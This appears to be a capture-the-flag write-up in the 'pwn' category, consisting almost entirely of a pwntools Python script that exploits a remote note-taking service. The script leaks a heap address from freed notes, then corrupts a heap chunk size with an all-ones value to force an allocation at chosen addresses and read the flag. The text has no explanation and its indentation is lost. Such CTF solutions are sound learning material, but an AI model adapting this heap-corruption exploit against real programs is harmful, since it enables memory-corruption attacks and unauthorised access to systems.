Tags: pwn
Rating: 1.0
```
from pwn import *
import time
context.terminal=['tmux', 'splitw', '-h']
context.log_level="debug"
p = remote("51.15.73.163", 8888)
#p = process("./service.o")
#gdb.attach(p)
def add_note(title, note, body=False, l=0x90-160):
p.sendline("1")
p.recvuntil("Enter note length> ")
p.sendline(str(l))
p.recvuntil("Enter title> ")
p.sendline(title)
p.recvuntil("Enter note body> ")
if body!=False:
p.sendline(note)
p.recvuntil
def delete_note(index, shell=False):
p.sendline("2")
if shell==False:
p.recvuntil("Enter note index> ")
p.sendline(str(index))
p.recvuntil("> \n")
else:
p.interactive()
def edit_note(index, title, body):
p.sendline("3")
p.recvuntil("Enter note index> ")
p.sendline(str(index))
p.recvuntil("Enter title> ")
p.sendline(title)
p.recvuntil("Enter note body> ")
p.sendline(body)
p.recvuntil("> \n")
def print_note(index):
p.sendline("4")
p.recvuntil("Enter note index> ")
p.sendline(str(index))
d = p.recvuntil("> \n")
print d
return d
def exit_prog():
p.sendline("5")
p.recv(1024)
add_note("A"*0x8f, "")
add_note("B"*0x8f, "")
add_note("C"*0x8f, "")
add_note("D"*0x8f, "")
add_note("E"*0x8f, "")
add_note("F"*0x8f, "")
delete_note(4)
delete_note(2)
delete_note(0)
heapbase = print_note(1)[0x9f:0xa3]
log.info(heapbase.encode("hex"))
heapbase = heapbase.replace("\n","\x00")
log.info(heapbase.encode("hex"))
heapbase = u32(heapbase + "\x00"*(4-len(heapbase)))-0x280
log.info("Heap base @: " + hex(heapbase))
delete_note(1)
delete_note(3)
delete_note(5)
payload = "A"*0x80 + \
p64(0) + \
p64(0xffffffffffffffff)
add_note(payload, "", l=0x80-160)
offset = 0xcafeb000+0x8*5 - 0x8*2 - (heapbase + 0xa0)
add_note("B"*158,"", l = offset-160)
add_note(p64(0xcafeb0e0)+p64(0xcafeb0c0)+p64(0xdeadb038) + p64(0xdeadb040) + "GIMMETHEFLAG" , "")
p.sendline("6")
p.recv(1024)
print_note(4)
```
